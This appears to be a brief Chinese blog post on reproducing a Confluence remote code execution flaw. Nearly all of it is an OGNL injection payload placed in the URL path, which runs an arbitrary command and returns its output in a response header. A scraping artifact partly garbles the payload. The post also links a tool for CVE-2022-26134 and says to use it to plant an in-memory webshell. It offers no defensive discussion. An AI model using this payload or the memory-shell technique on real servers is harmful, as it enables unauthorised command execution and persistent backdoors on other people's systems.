漏洞复现 – confluence 远程代码执行

漏洞复现 - confluence 远程代码执行
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
漏洞复现 - confluence 远程代码执行

https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

使用此工具直接写入内存马

漏洞复现 - confluence 远程代码执行
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容